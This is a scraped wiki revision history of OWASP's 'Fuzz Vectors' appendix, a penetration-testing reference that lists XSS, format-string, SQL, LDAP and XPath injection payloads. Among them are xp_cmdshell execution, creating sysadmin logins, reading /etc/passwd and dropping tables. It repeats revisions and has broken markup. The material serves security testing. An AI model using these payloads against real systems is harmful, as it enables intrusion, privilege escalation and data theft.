Site Scripting useless. If this is the case, you may want to use VBScript since it is not a case sensative language.<br /> <br /> JavaScript: &lt;script&gt;alert(document.cookie);&lt;/script&gt;<br /> <br /> VBScript: &lt;script type=&quot;text/vbscript&quot;&gt;alert(DOCUMENT.COOKIE)&lt;/script&gt;<br /> <br /> <br /> ''Example 2:''<br /> <br /> If they are filtering for the &lt; or the open of &lt;script or closing of script&gt; you should try various methods of encoding:<br /> <br /> &lt;script src=http://www.owasp.org/malicious-code.js&gt;&lt;/script&gt;<br /> <br /> %3cscript src=http://www.owasp.org/malicious-code.js%3e%3c/script%3e<br /> <br /> \x3cscript src=http://www.owasp.org/malicious-code.js\x3e\x3c/script\x3e<br /> <br /> == References ==<br /> <br /> '''Whitepapers'''&lt;br&gt;<br /> * Paul Lindner: &quot;Preventing Cross-site Scripting Attacks&quot; - http://www.perl.com/pub/a/2002/02/20/css.html<br /> <br /> * CERT: &quot;CERT Advisory CA-2000-02 Malicious HTML Tags Embedded in Client Web Requests&quot; - http://www.cert.org/advisories/CA-2000-02.html<br /> <br /> * RSnake: &quot;XSS (Cross Site Scripting) Cheat Sheet&quot; - http://ha.ckers.org/xss.html<br /> <br /> * Amit Klien: &quot;DOM Based Cross Site Scripting&quot; - http://www.securiteam.com/securityreviews/5MP080KGKW.html<br /> <br /> * Jeremiah Grossman: &quot;Hacking Intranet Websites from the Outside &quot;JavaScript malware just got a lot more dangerous&quot;&quot; - http://www.blackhat.com/presentations/bh-jp-06/BH-JP-06-Grossman.pdf<br /> <br /> <br /> '''Tools'''&lt;br&gt;<br /> * '''OWASP CAL9000''' - http://www.owasp.org/index.php/Category:OWASP_CAL9000_Project&lt;br&gt;<br /> ** CAL9000 includes a sortable implementation of RSnake's XSS Attacks, Character Encoder/Decoder, HTTP Request Generator and Response Evaluator, Testing Checklist, Automated Attack Editor and much more. <br /> <br /> &lt;br&gt;<br /> {{Category:OWASP Testing Project AoC}}</div> Wisec https://wiki.owasp.org/index.php?title=OWASP_Testing_Guide_Appendix_C:_Fuzz_Vectors&diff=13695 OWASP Testing Guide Appendix C: Fuzz Vectors 2006-11-26T11:50:13Z <p>Wisec: /* Replasive fuzzing */</p> <hr /> <div>[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&lt;br&gt;<br /> {{Template:OWASP Testing Guide v2}}<br /> <br /> <br /> The following are fuzzing vectors which can be used with webscarab, jbrofuzz or another fuzzer.<br /> Fuzzing is the &quot;kitchen sink&quot; approach to testing the response of an application to parameter manipulation. Generally one looks for error conditions that are generated in an application as a result of fuzzing.<br /> This is the simple part of the discovery phase.<br /> Once an error has been discovered identifying and exploiting a potential vulnerability is where skill is required.<br /> <br /> === Fuzz Categories ===<br /> <br /> In the case of stateless network protocol fuzzing (like HTTP(S)) two broad categories exist:<br /> <br /> * Recursive fuzzing<br /> * Replasive fuzzing<br /> <br /> We examine and define each category in the sub-sections that follow. <br /> <br /> ==== Recursive fuzzing ====<br /> <br /> Recursive fuzzing can be defined as the process of fuzzing a part of a request by iterating through all the possible combinations of a set alphabet. Consider the case of:<br /> <br /> &lt;pre&gt;<br /> &lt;nowiki&gt;http://www.example.com/8302fa3b&lt;/nowiki&gt;<br /> &lt;/pre&gt;<br /> <br /> Selecting &quot;8302fa3b&quot; as a part of the request to be fuzzed against the set hexadecimal alphabet i.e. {0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f} falls under the category of recursive fuzzing. This would generate a total of 16^8 requests of the form:<br /> &lt;pre&gt;<br /> &lt;nowiki&gt;http://www.example.com/00000000&lt;/nowiki&gt;<br /> &lt;nowiki&gt;...&lt;/nowiki&gt;<br /> &lt;nowiki&gt;http://www.example.com/11000fff&lt;/nowiki&gt;<br /> &lt;nowiki&gt;...&lt;/nowiki&gt;<br /> &lt;nowiki&gt;http://www.example.com/ffffffff&lt;/nowiki&gt;<br /> &lt;/pre&gt;<br /> <br /> ==== Replasive fuzzing ====<br /> <br /> Replasive fuzzing can be defined as the process of fuzzing part of a request by means of replacing it with a set value. This value is known as a fuzz vector. In the case of:<br /> <br /> &lt;pre&gt;<br /> &lt;nowiki&gt;http://www.example.com/8302fa3b&lt;/nowiki&gt;<br /> &lt;/pre&gt;<br /> <br /> Testing against Cross Site Scripting (XSS) by sending the following fuzz vectors: <br /> <br /> &lt;pre&gt;<br /> &lt;nowiki&gt;http://www.example.com/&gt;&quot;&gt;&lt;script&gt;alert(&quot;XSS&quot;)&lt;/script&gt;&amp;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;http://www.example.com/'';!--&quot;&lt;XSS&gt;=&amp;{()}&lt;/nowiki&gt;<br /> &lt;/pre&gt;<br /> <br /> This is a form of replasive fuzzing. In this category, the total number of requests is dependant on the number of fuzz vectors specified. <br /> <br /> The remainder of this appendix presents a number of fuzz vector categories.<br /> <br /> === Cross Site Scripting (XSS) ===<br /> <br /> Brief description here.<br /> <br /> &lt;nowiki&gt;&gt;&quot;&gt;&lt;script&gt;alert(&quot;XSS&quot;)&lt;/script&gt;&amp;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&quot;&gt;&lt;STYLE&gt;@import&quot;javascript:alert('XSS')&quot;;&lt;/STYLE&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&gt;&quot;'&gt;&lt;img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&gt;%22%27&gt;&lt;img%20src%3d%22javascript:alert(%27%20XSS%27)%22&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;'%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&quot;&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&gt;&quot;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;'';!--&quot;&lt;XSS&gt;=&amp;{()}&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=&quot;javascript:alert('XSS');&quot;&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=javascript:alert('XSS')&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=JaVaScRiPt:alert('XSS')&gt; &lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=JaVaScRiPt:alert(&amp;amp;quot;XSS&lt;WBR&gt;&amp;amp;quot;)&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=&amp;amp;#106;&amp;amp;#97;&amp;amp;#118;&amp;amp;#97;&amp;amp;&lt;WBR&gt;#115;&amp;amp;#99;&amp;amp;#114;&amp;amp;#105;&amp;amp;#112;&amp;amp;&lt;WBR&gt;#116;&amp;amp;#58;&amp;amp;#97;&amp;amp;#108;&amp;amp;#101;&amp;amp;&lt;WBR&gt;#114;&amp;amp;#116;&amp;amp;#40;&amp;amp;#39;&amp;amp;#88;&amp;amp;#83&lt;WBR&gt;;&amp;amp;#83;&amp;amp;#39;&amp;amp;#41&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG<br /> SRC=&amp;#0000106&amp;#0000097&amp;&lt;WBR&gt;#0000118&amp;#0000097&amp;#0000115&amp;&lt;WBR&gt;#0000099&amp;#0000114&amp;#0000105&amp;&lt;WBR&gt;#0000112&amp;#0000116&amp;#0000058&amp;&lt;WBR&gt;#0000097&amp;#0000108&amp;#0000101&amp;&lt;WBR&gt;#0000114&amp;#0000116&amp;#0000040&amp;&lt;WBR&gt;#0000039&amp;#0000088&amp;#0000083&amp;&lt;WBR&gt;#0000083&amp;#0000039&amp;#0000041&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;&lt;WBR&gt;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;&lt;WBR&gt;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;&lt;WBR&gt;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=&quot;jav&amp;amp;#x09;ascript:alert(&lt;WBR&gt;'XSS');&quot;&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=&quot;jav&amp;amp;#x0A;ascript:alert(&lt;WBR&gt;'XSS');&quot;&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=&quot;jav&amp;amp;#x0D;ascript:alert(&lt;WBR&gt;'XSS');&quot;&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> <br /> === Buffer Overflows (BFO) ===<br /> <br /> Brief description here. <br /> <br /> Note that attempting to load such a definition file within a fuzzer application can potentially cause the application to crash.<br /> <br /> &lt;nowiki&gt;A x 5&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 17&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 33&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 65&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 129&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 257&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 513&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 1024&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 2049&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 4097&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 8193&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 12288&lt;/nowiki&gt;&lt;br&gt;<br /> <br /> === Format String Errors (FSE) ===<br /> <br /> Brief description here.<br /> <br /> %s%p%x%d&lt;/nowiki&gt;&lt;br&gt;<br /> .1024d&lt;/nowiki&gt;&lt;br&gt;<br /> %.2049d&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%p%p%p%p&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%x%x%x%x&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%d%d%d%d&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%s%s%s%s&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%99999999999s&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%08x&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%%20d&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%%20n&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%%20x&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%%20s&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%s%s%s%s%s%s%s%s%s%s&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%p%p%p%p%p%p%p%p%p%p&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%s x 129&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%x x 257&lt;/nowiki&gt;&lt;br&gt;<br /> <br /> === Integer Overflows (INT) ===<br /> <br /> Brief description here.<br /> <br /> &lt;nowiki&gt;-1&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0x100&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0x1000&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0x3fffffff&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0x7ffffffe&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0x7fffffff&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0x80000000&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0xfffffffe&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0xffffffff&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0x10000&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0x100000&lt;/nowiki&gt;&lt;br&gt;<br /> <br /> === Passive SQL Injection (SQP) ===<br /> <br /> Brief description here.<br /> <br /> &lt;nowiki&gt;' OR 1=1--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;OR 1=1&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' OR '1'='1&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;; OR '1'='1'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%22+or+isnull%281%2F0%29+%2F*&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%27+OR+%277659%27%3D%277659&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%22+or+isnull%281%2F0%29+%2F*&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%27+--+&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' or 1=1--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&quot; or 1=1--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' or 1=1 /*&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;or 1=1--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' or 'a'='a&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&quot; or &quot;a&quot;=&quot;a&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;') or ('a'='a&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;Admin' OR '&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;'%20SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;) UNION SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' having 1=1--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' having 1=1--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' group by userid having 1=1--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = tablename')--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' or 1 in (select @@version)--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' union all select @@version--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' OR 'unusual' = 'unusual'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' OR 'something' = 'some'+'thing'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' OR 'text' = N'text'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' OR 'something' like 'some%'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' OR 2 &gt; 1&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' OR 'text' &gt; 't'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' OR 'whatever' in ('whatever')&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' OR 2 BETWEEN 1 and 3&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' or username like char(37);&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' union select * from users where login = char(114,111,111,116);&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' union select <br /> &lt;nowiki&gt;Password:*/=1--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;UNI/**/ON SEL/**/ECT&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;'; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;'; EXEC ('SEL' + 'ECT US' + 'ER')&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;'/**/OR/**/1/**/=/**/1&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' or 1/*&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;+or+isnull%281%2F0%29+%2F*&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%27+OR+%277659%27%3D%277659&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%22+or+isnull%281%2F0%29+%2F*&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%27+--+&amp;password=&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login &gt; @var select @var as var into temp end --&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' and 1 in (select var from temp)--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' union select 1,load_file('/etc/passwd'),1,1,1;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' and 1=( if((load_file(char(110,46,101,120,116))&lt;&gt;char(39,39)),1,0));&lt;/nowiki&gt;&lt;br&gt;<br /> <br /> === Active SQL Injection (SQI) ===<br /> <br /> Brief description here.<br /> <br /> &lt;nowiki&gt;'; exec master..xp_cmdshell 'ping 10.10.1.2'--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;CRATE USER name IDENTIFIED BY 'pass123'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;CRATE USER name IDENTIFIED BY pass123 TEMPORARY TABLESPACE temp DEFAULT TABLESPACE users; &lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' ; drop table temp --&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;exec sp_addlogin 'name' , 'password'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;exec sp_addsrvrolemember 'name' , 'sysadmin'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;INSERT INTO mysql.user (user, host, password) VALUES ('name', 'localhost', PASSWORD('pass123'))&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;GRANT CONNECT TO name; GRANT RESOURCE TO name;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;INSERT INTO Users(Login, Password, Level) VALUES( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)&lt;/nowiki&gt;&lt;br&gt;<br /> <br /> === LDAP Injection ===<br /> <br /> Brief description here.<br /> <br /> &lt;nowiki&gt;*()|%26'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;*&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;admin*&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;admin*)((|userPassword=*)&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;*)(uid=*))(|(uid=*&lt;/nowiki&gt;&lt;br&gt;<br /> <br /> === XPATH Injection ===<br /> <br /> Brief description here.<br /> <br /> &lt;nowiki&gt;'+or+'1'='1&lt;/nowiki&gt;&lt;br&gt;<br /> <br /> <br /> {{Category:OWASP Testing Project AoC}}</div> Wisec https://wiki.owasp.org/index.php?title=OWASP_Testing_Guide_Appendix_C:_Fuzz_Vectors&diff=13694 OWASP Testing Guide Appendix C: Fuzz Vectors 2006-11-26T11:49:23Z <p>Wisec: /* Recursive fuzzing */</p> <hr /> <div>[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&lt;br&gt;<br /> {{Template:OWASP Testing Guide v2}}<br /> <br /> <br /> The following are fuzzing vectors which can be used with webscarab, jbrofuzz or another fuzzer.<br /> Fuzzing is the &quot;kitchen sink&quot; approach to testing the response of an application to parameter manipulation. Generally one looks for error conditions that are generated in an application as a result of fuzzing.<br /> This is the simple part of the discovery phase.<br /> Once an error has been discovered identifying and exploiting a potential vulnerability is where skill is required.<br /> <br /> === Fuzz Categories ===<br /> <br /> In the case of stateless network protocol fuzzing (like HTTP(S)) two broad categories exist:<br /> <br /> * Recursive fuzzing<br /> * Replasive fuzzing<br /> <br /> We examine and define each category in the sub-sections that follow. <br /> <br /> ==== Recursive fuzzing ====<br /> <br /> Recursive fuzzing can be defined as the process of fuzzing a part of a request by iterating through all the possible combinations of a set alphabet. Consider the case of:<br /> <br /> &lt;pre&gt;<br /> &lt;nowiki&gt;http://www.example.com/8302fa3b&lt;/nowiki&gt;<br /> &lt;/pre&gt;<br /> <br /> Selecting &quot;8302fa3b&quot; as a part of the request to be fuzzed against the set hexadecimal alphabet i.e. {0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f} falls under the category of recursive fuzzing. This would generate a total of 16^8 requests of the form:<br /> &lt;pre&gt;<br /> &lt;nowiki&gt;http://www.example.com/00000000&lt;/nowiki&gt;<br /> &lt;nowiki&gt;...&lt;/nowiki&gt;<br /> &lt;nowiki&gt;http://www.example.com/11000fff&lt;/nowiki&gt;<br /> &lt;nowiki&gt;...&lt;/nowiki&gt;<br /> &lt;nowiki&gt;http://www.example.com/ffffffff&lt;/nowiki&gt;<br /> &lt;/pre&gt;<br /> <br /> ==== Replasive fuzzing ====<br /> <br /> Replasive fuzzing can be defined as the process of fuzzing part of a request by means of replacing it with a set value. This value is known as a fuzz vector. In the case of:<br /> <br /> &lt;pre&gt;<br /> &lt;nowiki&gt;http://www.example.com/8302fa3b&lt;/nowiki&gt;<br /> &lt;/pre&gt;<br /> <br /> Testing against Cross Site Scripting (XSS) by sending the following fuzz vectors: <br /> <br /> &lt;pre&gt;<br /> &lt;nowiki&gt;http://www.example.com/&gt;&quot;&gt;&lt;script&gt;alert(&quot;XSS&quot;)&lt;/script&gt;&amp;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;http://www.example.com/'';!--&quot;&lt;XSS&gt;=&amp;{()}&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;/pre&gt;<br /> <br /> This is a form of replasive fuzzing. In this category, the total number of requests is dependant on the number of fuzz vectors specified. <br /> <br /> The remainder of this appendix presents a number of fuzz vector categories.<br /> <br /> === Cross Site Scripting (XSS) ===<br /> <br /> Brief description here.<br /> <br /> &lt;nowiki&gt;&gt;&quot;&gt;&lt;script&gt;alert(&quot;XSS&quot;)&lt;/script&gt;&amp;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&quot;&gt;&lt;STYLE&gt;@import&quot;javascript:alert('XSS')&quot;;&lt;/STYLE&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&gt;&quot;'&gt;&lt;img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&gt;%22%27&gt;&lt;img%20src%3d%22javascript:alert(%27%20XSS%27)%22&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;'%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&quot;&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&gt;&quot;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;'';!--&quot;&lt;XSS&gt;=&amp;{()}&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=&quot;javascript:alert('XSS');&quot;&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=javascript:alert('XSS')&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=JaVaScRiPt:alert('XSS')&gt; &lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=JaVaScRiPt:alert(&amp;amp;quot;XSS&lt;WBR&gt;&amp;amp;quot;)&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=&amp;amp;#106;&amp;amp;#97;&amp;amp;#118;&amp;amp;#97;&amp;amp;&lt;WBR&gt;#115;&amp;amp;#99;&amp;amp;#114;&amp;amp;#105;&amp;amp;#112;&amp;amp;&lt;WBR&gt;#116;&amp;amp;#58;&amp;amp;#97;&amp;amp;#108;&amp;amp;#101;&amp;amp;&lt;WBR&gt;#114;&amp;amp;#116;&amp;amp;#40;&amp;amp;#39;&amp;amp;#88;&amp;amp;#83&lt;WBR&gt;;&amp;amp;#83;&amp;amp;#39;&amp;amp;#41&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG<br /> SRC=&amp;#0000106&amp;#0000097&amp;&lt;WBR&gt;#0000118&amp;#0000097&amp;#0000115&amp;&lt;WBR&gt;#0000099&amp;#0000114&amp;#0000105&amp;&lt;WBR&gt;#0000112&amp;#0000116&amp;#0000058&amp;&lt;WBR&gt;#0000097&amp;#0000108&amp;#0000101&amp;&lt;WBR&gt;#0000114&amp;#0000116&amp;#0000040&amp;&lt;WBR&gt;#0000039&amp;#0000088&amp;#0000083&amp;&lt;WBR&gt;#0000083&amp;#0000039&amp;#0000041&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;&lt;WBR&gt;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;&lt;WBR&gt;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;&lt;WBR&gt;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=&quot;jav&amp;amp;#x09;ascript:alert(&lt;WBR&gt;'XSS');&quot;&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=&quot;jav&amp;amp;#x0A;ascript:alert(&lt;WBR&gt;'XSS');&quot;&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=&quot;jav&amp;amp;#x0D;ascript:alert(&lt;WBR&gt;'XSS');&quot;&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> <br /> === Buffer Overflows (BFO) ===<br /> <br /> Brief description here. <br /> <br /> Note that attempting to load such a definition file within a fuzzer application can potentially cause the application to crash.<br /> <br /> &lt;nowiki&gt;A x 5&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 17&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 33&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 65&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 129&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 257&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 513&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 1024&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 2049&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 4097&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 8193&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 12288&lt;/nowiki&gt;&lt;br&gt;<br /> <br /> === Format String Errors (FSE) ===<br /> <br /> Brief description here.<br /> <br /> %s%p%x%d&lt;/nowiki&gt;&lt;br&gt;<br /> .1024d&lt;/nowiki&gt;&lt;br&gt;<br /> %.2049d&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%p%p%p%p&lt;/nowiki&gt;&lt;br&gt;<br /> 